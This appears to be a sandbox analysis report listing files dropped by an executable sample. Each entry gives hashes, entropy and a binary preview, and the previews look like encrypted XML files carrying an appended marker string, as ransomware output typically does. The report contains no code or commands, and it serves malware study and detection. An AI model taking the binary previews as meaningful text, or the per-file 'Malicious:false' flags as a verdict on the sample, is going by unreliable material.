...h..XE:x.RU...R......1d%...8vW..j..;..;8/L.?..7....2.C5..X../g4.........ea....kl..Z..{........I....{.G.!I...Zm..I......0I...c>.V.6.k...Z.*..b!...4.....A>aJ-.p^.f.mv......p.0[.P...2...D`...c.Q.a.....Y.....6....r+..1LN...(.X..]~......r..$8..$..'.5.p.h..I6%..S.Ei..v.a&.G(..>;y.}r...g%..+..R...L..?.N(.*..oal.B...,.;..xA..o.;..*...C7....n.....:z-pu.t0e...D.?.zB...1..H....)8z.9....bh..{U..D...>D...5.>............C..`..-..6...............C.=...q...a..S.:`....~5]:.....cN.....Z.........@r.F...Z...o.".l}..I2......0n..V....t...&.I....HR....#..E.c.<p......p.^5.....p.O.h....>&[.y.I..`.ndm..[.)....N.(..$..4..M.......w...s.{.]c/~........L.@.@e...:..n0vL...z..S.=lq...l..GG......$Q.V|.....&...t....a%...=..jw4..N.....L..1....F.U..).m.U._..\.;.L2..Xrda8.\.g.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1155
              Entropy (8bit):7.826220230539901
              Encrypted:false
              SSDEEP:24:xxbx5IaDhoYFuxgucw8sCosteQkZwCd1S2d+bD:rAaDSYgxMw8sYteXZZd1p8D
              MD5:7A9284BC90C048B4DCD2938673AA8087
              SHA1:2F8F33EA9932DB174E11BC958A0A35C4F5E342C9
              SHA-256:6FFCB9C74EB7FE34724A92935D88E0392C504A220145C442B0259D47846C1620
              SHA-512:772FEF13D7CE895DDDC14B623A24AD0096CA03F7D700B601241AC0B51D17024B7B67DDEC859441CA2B112324A8C3FED757D8CFC4D49322479358BA33C3AED911
              Malicious:false
              Preview:<?xml.r_.J....b..}..$.c....\..u..R_._.z...N.M..EQ.,..~....I<..R... .~I.TK.d.Km_+....EGw.fx6.O.X...xsj%bql2Tk|...1..[.#Y.m....D .\B/.....g...Q%0..O.w./S.~.w..[.<.\_u7...w........M.o~s...A_O....L.Ep.A..u0..d{5tBD.%........o.....)..+..m.9..I.oq..s.8.Z|#&,.....0.:W...z~....].^..(.]......5..X&..i.W.6....R]I7D.....>@W.....9o.2..1.l~HT...,...c....s.4.N..a....T....>.Z.b.A...:..../....l.T...d.Q.#.{..a]m....G.^...ts.a..z+.yu....d..n.....z}..8..w#K6j-/2!...-...4^.h..?..z$X..T..@*.1.O..'.*J.. xk...U&.T.xw.H.#I..Bw..`..t.!B.y.....ryd.>..%2%Z.....'.H<...A.M..tt.Tg..|.%..e........T.[..O..9..c..u{.?|....../O.O.2...<%..{..S)..Z..{..<.....Z...7.21%d.a..`m._..4..|.^.8.`2..3v=kS.[...A..G4...G.YP?3..-a.d5.%....K.......eH.1a...r.....g...xC...5....M.k.w. ..@...i.*.....`.Y9OZP..=J..u.X.....!..J.:.....f.>.d.4G...6;.....7..~h......6\...U..I.^.....h..^....M....[......o.1+.....J...K.t.._.?.ey...5..,..T'.........h...p@z...[..3.. D.g.=...2. M.R...U.L.W..*...*.....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):715
              Entropy (8bit):7.748998957997653
              Encrypted:false
              SSDEEP:12:6KyUAe6GSXzYuLsDeSkXgVF4fRleyDPLawXZtV3U8CpmfhyOmHsWadxa3cii9a:np76jYuL6Dwgv4fRwmPLawXrz6mZ5mHn
              MD5:997AD409F274D6F79F84273806E4072B
              SHA1:884C2F3C2292B53AFD0BFB1A041F70ECF33BA681
              SHA-256:52DA3FDB687EFFACEDD23413201C762293DD83918D0C34811D1354D3BC9889ED
              SHA-512:029ECCAE9FC2D8259A0915015D7EB57F5BB45C495FA9FB39C77E844158D764A49EBD1B21575306F3AF3F3FEEB6728E624D8D2EFE11BC7788F5D4885C2CA2D5BD
              Malicious:false
              Preview:<?xml.(...QrqR..Z...f.._.....]co...)?......d.1.."IO..R;..I..k.....!....UBH..^^....o..F..A_....V.X7.]..|..._..|0..[qM...;...<....d.:t).....+....w..:K2...d..^.;Pke#...#B..i.k..[b.../q.E.WB.."d.u.A....).\..3..e..`.XS..n.S..j.^.(Y@..D8*..G*D.%c.H.y:.VtpW.\.....%..U...s.....H..{9.FU.$c...<...F.[...y...<..k. F.G%N.1.C..:iV.LL............DE....D..o..T....\.yV....... .Z..c..o..5.#.......g..,j....J...?e ...XzNU9...>....9...n#....._#!..R.|W...B..:..H.5......{"y..t-.......f..X~.Jy.l.:..$..<k4H,....w(.........;g9......y......*....b}Jg{...&..}?%..K.2.v..2p..x...L.K.E.......<U.L.....l.:.+.X._.~.....I.hS4.4....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1398
              Entropy (8bit):7.869342389008334
              Encrypted:false
              SSDEEP:24:UTCIn1r+pt3g+QKcvl/mehoi4MnE+WcP3fp4RarJKXJResWPd+bD:Cdn1rMtQ+7cvleehoP5+W04FJRezF8D
              MD5:DBF1F11EF52A9ED82B34B9A8900DD93B
              SHA1:C514BCB291831332E780BC4FAD6CDA8774F2678B
              SHA-256:5D03555E8169BEA7D9DFAB9DE0C99D1226B023BD9C421294DD25CBFE76F161DF
              SHA-512:B73256B0224A5647FFF2CC8031ABCAFCA260D1092489AF34B704FFAAC741B2F4B81EDD34D73DFE946086DDE2A14FF9BEFADF6A6C2A59F68A5048FD137CE98320
              Malicious:false
              Preview:<?xml.x...L`..K...^a.).}.B...l.....T.w...1.K..d....&:.C....Q;5.bT..dja.`.,........`..PE.....{C5..>..%p.g.h..M<%... J-...."P..../.."5.29...S.^......hTiV..a3...T...._[....v...].sq..KJ.....j|....n..Q.y......8...R....w.r}.+....f.X...3.f.QP.dG....x.t.9J..a.F..n.%~..S..Hz.......e..........X.....,...h.....3.-._z..h..t...E..u.U.W8..;.+.....%.....a<...:..'.dG.....9=V.HO.....K..4.:ex......JEg.80.-#I.+.T...N....7..6..F.$M?.....e....[../|.9.5.+..H..%...w..c%..0.......&s....A..|....Z]..y..:.K....#..Y.T...e.sq..4C3...:._k.... f....+'....tpY........:.<1.X.|..{=..N..x./.G......|.}.../~=m.....].`.ul.c+.g......m%.{.hF..S..9...U...g.m.,9...%....C(....v.2";7..GKGK#.{D7!..Q.w..xRdQ..9.....D2!.......~...f...}......[91W&.%.0t..N=m...?...u...K.i..(d....C@..wzXk..6/.....6.'gF.NG..[....v(.U..qKg...XK...q..)..x...c.....4...)(..i... .......vb.u.@,PL:...'V..i...vN9 ..KhEc.i.a.ajcu..T.:.......U.!.7W....M..LH.........oo6.&%.@G..>.b......ew......&.Q2_A-.S.YY.3UW.R.m#
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1008
              Entropy (8bit):7.7970645056714005
              Encrypted:false
              SSDEEP:24:MDthU0O3/P4cBMt8YBFD2jY7Be5uttKElp4fXgKXWY3d+bD:uU13/P05BEOBwuHKElKvgHq8D
              MD5:370F62BA23EF1A041E111AFAF139D590
              SHA1:09311FC8E2A07B840AC78F2057B18D699E2FB7CA
              SHA-256:F21C38BC51E1CC82D633D87B2A6F060410E65BAF31D5110470804351183DFDC6
              SHA-512:6AF26F38368015F1CDCAF3916FCDA883C7623B24007A26078D4694E4E53514987C02786A2D8FC238AEA8F06DCF9D15DA67F3CEF920626325538D6E02F287CB5B
              Malicious:false
              Preview:<?xmlB.\..#.*........\+...E0.M........5..\........</....0..9.7R\.K....].s3.T.....)@.+...!).>l.........De.?.T.......iE%4.X-r..K.m>....pZ.-u.......-.Z>..k.LHr...1.../h.{.....9.,n...Z.....k..yf6........f..|..]j}..7JgK[.J}>].o.....LO....I.e....)v...5.v....#.........Z..*.q._..q....75N.w.@..8......,.a.,m#.OP.....7I..'v7..]...$....:.a.U9H}........1Z)..~...:).4.u}.&.X..n.>...5m....L...n.........f.VUIbV..AdS...j.Z..RZ.@."@..1V.\."1....s9..Y$*...~op...6..f...R.\....^s~.....K0.(..t...;..R...y.sN...^U.5....).......J.A.......[...4.y...+.#.......H.-6C_ ..}...v...J.5IU.....:.......d..l?.G..../.....1..GEE...su[.........._^............\..]..../..I..._.+..8D.G=.!.47s...}.J...6am..E...F..kG.{D.....7.j8....J..S..@Kv=.hz.f;Yl....}p.C...^0.....IO.o.bP..*.k....@.$!8WB.-L.1...!i.....k^.l.....H....G1........y.N.......*ADsO.....=.d...G.C:..6D:..2..!,..l).....w........&!.m..:;..@...kU....+.....H8..&..`....X...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):719
              Entropy (8bit):7.721806322858484
              Encrypted:false
              SSDEEP:12:mE0u3ol+cCRaqHNkJmMMHs3kAZOyxOvfTNc39lZ3eRX+Imdxa3cii9a:SgsKaqHmErfAP43TNkDZ3G/md+bD
              MD5:87D123A6DED7C362D8DFEA2E0ACA197B
              SHA1:283FE8F9AF71531FE05DD2EBCED59F91D0C1ED6D
              SHA-256:DD1DA6ACCAB54EE9BE19CB7334200DA3F3F19A9485B676B3E4C95AC73B6B2E6F
              SHA-512:530E010818F8236B8FFA69041D0D1A3F91DD26B9E3D80F10FEAC6078C2828D03798E757DB67FBF8ED2B98F88BF1E99A960B71CDDF4F39770C6ADF5479D910278
              Malicious:false
              Preview:<?xml22<.&.o_...~V.......&....Q.....X...k....uQ......R...e..k.@ZO..i....<.....+.../..#...k.,.j.iD0...\/..i...8..g.........".......6{.L.f.1._a3mX.......B.h.#"t.......m.L0..~.?....C.]k....#...x*K..c.41=.V...+.d0....-sC...T..F.>........lL.m.v.xlZd..1..q.q.1h."....5...1q.O{.~.%$C.n.#t`.V........l.0...T.'.J.f.n.......A...s=.j_`.4.....Pf.a$F.J,..Wz..1...{..?y."0........1..$ds..*l..Z...n.b..).G..=S...7!..I......z.(.~i6..JHr.k....3j.n......{n..^...wb.\...Q.7..........N.....L^.qq.v}.dn.......O..t|d...&...C.M.O.z....Z.....g.vv.7.3T>.|.`.p..}...n^..1>[..^kA.......|>..`...3....P.. .7{.rV...t..>RG[..;...y..B..Oo......>...0gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):793
              Entropy (8bit):7.713758331067789
              Encrypted:false
              SSDEEP:12:O2WzLcpRFdDbt0EI09dQF/D4ahClzvTlQA4nMwhy8/6Gkwp2cvfK+O0dxa3cii9a:O2CUFp3N9dQVkGCZ4Mwhyvwp2Knd+bD
              MD5:F60C7330F7AB81395DF79EF71AD22596
              SHA1:08F049E04781066910C515C1A1425A3FB76A488F
              SHA-256:29FB92C2DC98257B131720081FE0801D65B59B92A2C47EEA069320C9B64804A7
              SHA-512:208CCE30FA90D7406EBADC3036C8CB50FA3F7478355AF8E8B85A444CDCB02B5592ECD1F2A95BFEC8CD9EA5815047677A08682B58DBE51605615364BE8F7674CE
              Malicious:false
              Preview:<?xml2..%.yv.X.V....N.]..T...._.".a...e%..B..k..O_A......[&..7.....Y....@....~.N.Gg1.a.....8.Yz&N...B.P.7..=.k'A...:...tv.8.]U..pc.T[..aw=.-.t........1....*...;.}..H.."...C.?...9...............%...8/}_.....&+e..@Q%...H..0'....hU.X...c.......au..(........... T...'f.~z*...'......A...c.!la.'V...\...s&..I......J.....d.+........t[.z.E.?..P.....i...T.:.R...p...Q..(..[k..Nd...Zfr94.i.zQ.V..F0'.A..VH%z.;...^....~.6:H.y0.jI...7......+..J.1.C&\."LyW1....^....p..~z....S.$.K.5y..s..s..b.O.*.OI.5.kmW.i......o...R.H.....1....0.a'...%.9r.CW...:Q...sj.6}Y...u........5....B...O.........K..&}...~DI.sXw..Dc..X. .]RUwB.=. .......|.S.......'..(.....,.I..L.B)_.H7UK..a.._.[.T.fC.w.V..}.d.'r.^.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):761
              Entropy (8bit):7.730279926251439
              Encrypted:false
              SSDEEP:12:xCMqlCYH68g5Fh6OXAI6g1zVUBbbo+Tflj1NtbI0OAYC5DFKzAUd7dxa3cii9a:qqf5FkOXA8Pebo+ZpI05YCzo9d+bD
              MD5:6BD8AA40B86DDDA20F7BE7D7982190A5
              SHA1:908C409AC61709351E12D1FA1BE99D1877BB1E7B
              SHA-256:19301D02158CC953ADE7BB4EB475056E9146F8232959040C9FB8E49B5C3AE7CE
              SHA-512:5AAA2ACC13493433F3E3298CA2D4955B7FA82B7C63AC90557D957EEBE5966B8BA44AF3D12F27082C8CA977F0BC06C954819518ADF5CF177B88EA72A87E65F699
              Malicious:false
              Preview:<?xml..V..n5=.W3.Y.^...#...c.5.Q.3..;....TW..O.Y.......m./~ o.A.Y.j?......l...:X.x.&4.+...y.DD..K>..4....b....;.zUT....VK..o......;..I4.e.V.0.).g.Z.....|..|..e...&........Y.G&...4g.Iv.qP.p..tn.9.`...VA.w.$.yh..w.Ad.F.p.T....o.Z.P..K..r..&..N.@....T...x..x.%.....ut..W...?^..B.......j.[...Lw..%i.4}..V.I...'.>]..)...K6...]...b...U.-I.S.d..*.H..>|!.w*w..7..}k...P.............S.&0..V......n.c......X.....br8$=.W.......[h..P..K...92N.a..,u...5...WBgH^?..........z...\.E...<R.p..U.@.....SC.M$9:.\.-_vk.{z.k]..f..7.......pI.....7*.k.......K7..Pd<.>x......L..<..S.[..mt....4.)ve....#....p.c..Au.[...|>k.....Y..L.`...;E^...*..0.......Y.\...hS?...b..,s~tA....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1306
              Entropy (8bit):7.826625365572696
              Encrypted:false
              SSDEEP:24:nVuIPLrNd8zfc5oRvO4vrmnKx0TxPKrjD7eQMN2C1SxqqWoW0IGfed+bD:nVLPLj8zcGVmW0Tgj7eNrfc788D
              MD5:DE9D7F0BBFF2DC7A8466D7A557A5E868
              SHA1:9C3BE735B2DDAF6C32974815778B010806E7900A
              SHA-256:11031F0EE1DBA2504C28BCDC78D4BCD11031D677FA9FCDC3AAC302FF440E9BE8
              SHA-512:A71174C673863CEF508722C2DAE1650CE6E980C3785F0B46EEA65E4320DD20977828D900602F6FCCE635D0994D6BCFF24067C1FF4063888F54F8765C9FE02C9A
              Malicious:false
              Preview:<?xml.w..l...8 .S.3e.m..J..$....S+?W.TM..~.l.b.-.3=..b.*.9...3..Ax.I......^...=......pw..)l..X..-V..YQ.../..7Qf.7.!.I.k..D.....N.aX.:...I.l....y...|.!<M.{~....[I.. .f...E.......u......./!(.F51.]qS.rYE...;.3...B.D...`n. ...@O@.o.mz.P.^.sw._.....ZRR.......1.$..r.!)N#)j..._.l?.v6X..!tG_&....B.>.......&..r...*...F....l.E=r..../....."...|.dS...=z;?.,.S>5K.'.b.:....m..m$.....[.'..................bY......... p.N=5WO....h. sl..E|...&...t.m%.^.O.M...i?....dD......7\.#. ..q w>-.....f..s..0....`...R.1*j`._).u.....Q<...U..R7.].m8D.M.N...X....>.....$^.f#Dh.Z..4..f.^t[.%...LZ..1.f4W.....o...>.=-o.xW$..i....n.....5?.f.sNQ....{..<....7.......n..v...."..2..T.K...Sd..v(.(.[....#+U.Z.....%L&.yX.*.....-R^\.j..K..}z.L..L].L.=Yfh.....F.....f.....)Y....ZR.]Oh..ce.p..%t...fw.JB..=.D~..o..8?.2m.Fs.........T....sE.)5....G.|.X.YQ..+..Z*...l.YP....*.Zz...I..nD.b...R....z..uG..Ei..{..W..9..7$B.].ja.U..5...Cj._\9z+.zS.a..J.F..\..Aqn.f..QhO...........i~%FF?q$5Q.U.&2
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):4285
              Entropy (8bit):7.953531276616554
              Encrypted:false
              SSDEEP:96:ay1UEJVDFEmQem7kgyxpETKpjdRvoMoLP1KP35ilW:aeUEJ0mQtAgyxpZvoMa9KP35io
              MD5:676179DA22F2879F8364C06E49E75C2C
              SHA1:A877A1247E7D301ED55FA7A73CE6A44EB5944543
              SHA-256:8C77911DF81FB0F93CCBCF8BBC0F3DB953311116F465BD2EF59D7B0A3D86D3FA
              SHA-512:FAD2D9B0B2D47EB219BBCDA21106F2E591EA51CB3B7277897E607CD2F2FA1ECC48D760EBE8CDCF89CE1AD11E56B2449D634514C21242EA3057383A216BA01E26
              Malicious:false
              Preview:<?xml..g.R...b..k..v.....m$...j.7~.[$.>o...g.;a..@.Ek..~.p.:b.'.t.E...{9..C.c&.9#..+..mr...j..dry=......`....rW./....:1w......w........n7.B.N.X.J..d....B..vOT\.........`...H.x.g.A...[..?.jg.5.b......:.O.Q.+-.S1}.9./.sJ.j....Z\.}.\...8r.!t....7!.\..%.O.A.....~..P.@G..L.j.O.......5!.v..&-..T|....<...N..5.vW+"...43.e.U..D.I...~{*..CwWv#.l....W......1(....._m.?.?........}E.*....g......J..B...*....X._^.j.D....9*..w....z.......H.2R!R.T....'.Z... .*l..Sw...o:..[a`.'zr*t...t."A..*...;.2.$.........^j.d=0B.r.?...1?=..A[...F.&J.`..a..3.......WKU.LA.F....@~.p;....L9;0....G....6m.c%j.{.8.7...H.I.,b!.._@.s(...k1z...P......~...eh...a.=...g....J....\...-m1..HPriz.w..:.5F.o.+a.-wG.. v.U.?$,..{.J../.^h .".=p....o.i....4.+.(.wc...M..i..J`.l..!...d.C3...;....B...u....<..t.Z.Q.3lR..DI.....L.s..$........X....D.L....F.....C..TU....q...r..../.Z......N.R.:.E.(.)v[.-...*....'.9../...s.....dH..r.......5..}...Gb..K$......NA.:.l*"F..6.y.9.r....3F....Z.A.?.8%..y~]aI.\s.+..@.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):854
              Entropy (8bit):7.757140408017096
              Encrypted:false
              SSDEEP:24:04ABzpKH6dOgTTygDBeqP7GSg7hVm380Yf9wgLd+bD:04yMCT49X1wgR8D
              MD5:7A42B5AA94C7AB2B4AC692D6123B1F3B
              SHA1:CBC8BFA91D6DF96E4ECBD31AD1A3749193FB3D08
              SHA-256:D9CDF725BD82E2FFC39B78B1FE67F9FCECBB57E7542224471F4B26201E6939F9
              SHA-512:ED3D87591ACE9B4807F8CB66EA758F6F3B2FF14DFFDE58DFE5C11A4CDD5C1EE9D070E21FCEA10AFAC2935FDC3897AF485020B335A690571BF3E13F5D0E2DDFFE
              Malicious:false
              Preview:<?xml|o.s..4.............K:..Ag....v.f.._/D..\.F...H...33x@.Y=..!.IVy;4+j..A.....Q.]e...X...E..wl.....b.p........s..E0..').-.;..v(..e........2[....P......S...!... .....].."/."E....1...).....Sg.:.2......f.d..:VL.L.{..%..P.......6{....W..i#...q..{v...}..^..47[.L`.f.P......i2M.;.v.).:u.K......%..P.pH.B.WJ..%T..R.9s..c.....^.0..._....o..4u........).i..zo....... .i.%"........1.?.R...6%L*-EBn...8.........#.&.[~og..Xkmp..,q.*.L...y..$.j#$P..iF...}...!.....c.=.....L..!.m...t/?....^...6x.mi......?..n..t..mU.. 7...8..H....q..M|...0..6!..\)T..1+'...)...n.mo..&~s..-.T.O...2.....Zc.\.w...I.....f...*[...3.1Q1....j.o.>mO;.>.X.oN.&.T.?y.....J<....2...`..m...2..H.g.d:.@1...B2...9......k.J...X..V..v.0_F.!................U%."..>..L.d.3qYw-.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):929
              Entropy (8bit):7.766250777956423
              Encrypted:false
              SSDEEP:12:cCcpYpNxklljmIBxn1NXfUSd1Y92kW/NzrjVe7M0yfjAnRKyABOFQMiwqJkVbdx6:VcpXll1n1NHvP3dP07MtLgR7kn8d+bD
              MD5:3032287F1CE3B1107002CBD0054B947B
              SHA1:FBF4AA90D727399810AD66CE514A89B33CFFEC0F
              SHA-256:55E174B09F0250E184FAE35FD02B9A220698F6F4CF8D3B44BA8D390BA663B9B4
              SHA-512:7D529265D7D1C24BD54070AC3FD1D19D522F9243677541F824C9536AC252CED7CB259B3B457D2F98608BF9E6557EFD0EF620569E2410ECB0464EB986329CBE04
              Malicious:false
              Preview:<?xml....esxg.+,...8.*......[$......G....M...Y.....>VW........1......../...~.............L.^.3...A.(....R. .X..r7....!..2..4Q...>....jt.=.k.n..@.z1M.9.[..v....1....d........n.....{T.Vq.#...H...q..W.6....p...'y%....I....Y.<.!i.....-....D.m.etc........o.....l..^.^~.r4..+...|d-.+<...;....7....E.....0...O.B.U...44..B.4xy.o.......Mh.....'.../.h.0$.K.......k..B....1g...f...-..5..K'..Kz.N}.GS....a:.....we.o=h7n..K...Ui.[r./.1...C\..'.li.....XE-7..H.J...Q.BX.:.;AD..cY3...j.K..~..0..B..0.T5..I=).A...2"..q9...y..:z?.G.....&..qb.QL..c0.).....d...$A..../.v..d0.`m.lj...#Tm..}....Vk...p..UU....,..}b.+A3.s.a..S.o.a.f..$C.2.U>x.{.e.0B2..}.....l.{I.._&{......@ml...N.fN...0E..a..'._)Y.P..f...z3/..B.ku.<.Z.|l.....W.a8%~.d.........d..f...`.$..K..x.2-...;.&...Q.....a.Rf..D= ...Q.A..@J@...4..........t0..70.Q.D...s^..N......P...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):722
              Entropy (8bit):7.699126564488837
              Encrypted:false
              SSDEEP:12:JfiWCTlOWd186gYML9dN7FqzV8CU5dK8JN5BXr8wCNHZAzrDYbZ1dxa3cii9a:JKWq7hKmLWK87r7AZAvDsZ1d+bD
              MD5:FFE2B69493F45ABF23BEC088DF4C5CED
              SHA1:C3E541A1227684E749849F89B3BEEA2D49A007B2
              SHA-256:A497D17DD23F8BEB599856AB98F18FEAA3ECBEAB0B44FD96AD0FFB8B623BAEBC
              SHA-512:A71CA3EDD680F9CB2055B33E95FB0DFEAD0121CC012729E3469296665C5A1F712A328C1FE9EA8923E57B1A706BE8E4FCE479B4B71E0541EE5ADB871CF710E57B
              Malicious:false
              Preview:<?xmlZ/.....A.W......~.....m.......dO'..........Y7 ..?....F...T.l.. ....i...9..4.._...[..K..J.T.e,..D........G..:...JF..w.S.}.....:...^...gN.M.;.A...k....h/.....NE.....a.Cz.n..sD"......f$.......{..T..j..|.i.....O....b.B..8u..x...$...v.D.........\.e.P.9.g..E:.#..s.....,.8y....;Yt.......bX.......Y.LM.1./F......u.....v;....df.B..BG.V..fWP...]..E.B\w...=G..........|W.e..]_...W.Q.&?.\..nc.p.v...(.......79....~..;.{...*r_#....]..-N&.BC..iT.]]._.o.^...LL..1.QN....z ..-...&....s..S.H....31.S.%7....?(..|.......Wof..a)_`V.....-.(....`L.M.>%[wk2|H..o.}H}:.......f...4.)V9.......B....<.....&...AmZ^q..&$..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):935
              Entropy (8bit):7.779825998550759
              Encrypted:false
              SSDEEP:24:WLtdW4IoP7WpNEc1m03kQ2Ro/Ss/Y/i4xYWCX7jkd+bD:WxP74yPCDAYFva8D
              MD5:37E378920B2AB31BFD954F818056BAA1
              SHA1:2162242759B69673D8F586B39CBC3777A14580EF
              SHA-256:D0C6587F3E0A58ED1997D5A9F72063E0AD4303AD0F4ED2A7D5DEE860A86FE041
              SHA-512:FF5E4405953E842F43384D335EAD90A110EDB3834F8AED4B4D2019EBC6C2DE03B9ED46CF760BABBCFD75A105F6F1776613E63E51E1272505EF7C8617E03B0AEB
              Malicious:false
              Preview:<?xml.kA"..-.?q.Tu...).J.....q.g.s.G.....?..b..K*L%6....u....3....J.. .z..-.."...k...E..;.[.s.)....Z32f..N~.O.-...........(...n........!.R)......^..$w/g4....L..6l.P.g.csl.....48..d".Y.m..z.<..* r%....t ..P.'.....H....., .;XP.?."...E...h...]kr.4F1..^r-...^.....LZ...........E.LD..YUq.......Y.......L.69.a.(}..]..F.4}....(...&><..(...h.Jay.6...^=..eU.;<.x..H.w../.....E.b......}..X..!S)#..W.kz...o.V..........cR.v......Y...|.yu...k.pw.....\.......t&..(Me.Q..T....n2R....<.P..........$....=.....k(....%.......WT...%.>.g.e..i.G.w=`../....S..R....L.....+;Gb.,pM@.B...v..-..E.d........1u..f.......}n..L.}(3a...b.T}..J.%......r...m....~]..-..m,.......m.e.6.......# 6.b^....T.bx.&.V.O...rrG..06.]~.7j..|5k22.=......4h.)..1S.6|..{C.o%...6.*.....-..w.....>..{..L.......w....,?.......D.O.].....L.ks.(#....&.....*..O..I.bg...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1357
              Entropy (8bit):7.841140900054718
              Encrypted:false
              SSDEEP:24:jA0BK1DJvRFgKuw8eY33l7Mz6/D2Pe+KJeZXth9tj6VOoiKeTG3D8KwSXLd+bD:jex7uNeaeNKJe7h8i3T9qXR8D
              MD5:E583EC5855B7790BF7DFE0F4D29A6B3C
              SHA1:C4406553A16743B92DB75CB45BAD62626DBB1D77
              SHA-256:02659DB6311575C935F1BB6CD4431815DA77DA88EC42CC181960645FB428D695
              SHA-512:352EAE1BF6CDDC921AB2A792CBCB619A81E76333603F2B44BE27D3571D22D7EB6C59D60B2FF28DAAE4511B515CE3F3AA4B18C5C750FC8E846909890917E15823
              Malicious:false
              Preview:<?xml.Eq..X.._}W....6.D....M.b.c0&..F...$nG......O...%.O........z..B0Oj..(>.}F).E ..:.u......B...C..5~X.{.K.qO..h._..X.g.?i.x...o..>..I..GW|n.!5...;..m.........bS:.+$....R.f.YBk[.UH$.?%.%.........e.md)......].'........a|...`dQ.^..X..N].H...J..6)>.l...'P....Oruy.c....a..1J..Bl..C.~...vs....$E^.......#.X.&4.......e..~:..`.l.x..Abu......!.a......GX.L.Y"..K.*..1.j.b*.....9.3^.}.3.r...~O;.U..4e.J....I.U.,..KR...A...&....X(..?.5S&..z.,.>.-...e.e.u?...q>R<`...'.qr.........B+...e:4!@}..P%(......^S..Mg.2t.&lOc5.ng..P.I..)..h.#.yz$.-....yY.x./.X|.ZG>..!a........#.xK8...m....B.....K5.C....9......Px45.9....p.Bn...x..cZO.T1Bh0.<O@..M.#.^..F.$XN..^.,.....X.\.aATRA|.E.c...Op[.i.'=.m..>R.Rw.L...j..%.r......}BY.>.=.....K*y.6I.T..m~..y.H........P....5...[.l$tV..g.{......w....21..X..v...<.......YKLYi..X6z.p..2u.D`........f..zU....E...r$..$..jj.....T@}0...h.E3'@J8yI........?6.<7l.U.g,..s.=....>?.._K~D..?...c._q....qG2h.iP..k+...$...B~...+V.!O..j*.gW..6....H
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1024
              Entropy (8bit):7.806353366980431
              Encrypted:false
              SSDEEP:24:5vh3aKXCvX9JqyI9oTLAQNYQFPJqbNd+bD:5J3Dg9Iy8CHP2n8D
              MD5:5A8D64161109F1626F84CF3B38E38D07
              SHA1:0301ED27B7ACD116FAC71EEBB95A8D54D7976BDD
              SHA-256:AFE2BF61BB4FF64482298A29CA18492C62D2B7BA3A628AE0CCF8A0B02C0790FC
              SHA-512:228E556E7FE0B9907535ACBE90825681B591BAEB8D61E1F848A143DFC1FC9C79975BDE5D1691E71F75E0F5CE2BB80939E3B60A7385D40EDC4F6043EC74DD4337
              Malicious:false
              Preview:<?xml..T.SR...3#..jk..1..2.yG.1.....Jb@.-.|......W].....!.9W$....gZ..%...R.w[l....o.#:.2..4AIK.38.].....!...;.jHg.S.#PhCRz....Y;C..&/..m.......D.G......o..s...".1..-....w[.!.".U.,!.$J.c..l.L.,..#.....$_h...}..j%H1.G.`.%.i/....c.0.....u~.......RU.b0<.._.7...!R.~. .TB...k....f.w--;.,.L.@$y|..=R.,./.%..........4.. >.'^O4.;d[.`.u...-...KR.o....B.QoD.=.A.fjO..7n......`.k .6..d..1.yG.V...!......}5..(..I.M.!.`q..M_....QX.Wj....t.+.C.....J..P.P..$..3.....a:,'..pY. .bU.d. .(8.{n .G.....}..{#.F-=.u....x..G#....gM...6..}.....fL.XR....?..2.y*.......n&X....B..lj........m#C..~....X.u*.G.|.5..i...|.,..i-v@YDP.:.n..........X..p:..................\...c1.B.... .....U...u..w..~..8Co....... ...).Y.vp..I..N.1M.x.,.QY.[...e..--%.N......o...E.<.G..45.....:..k....;!q..6p...."..........*..$._..7...?0..z.S.rne....*..............{>>...Ew....fl....X..l..!..p.F.......Q.t@;...G..$.o\"Y..<....J..c....N.Vx..k..O4h./...=.$gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
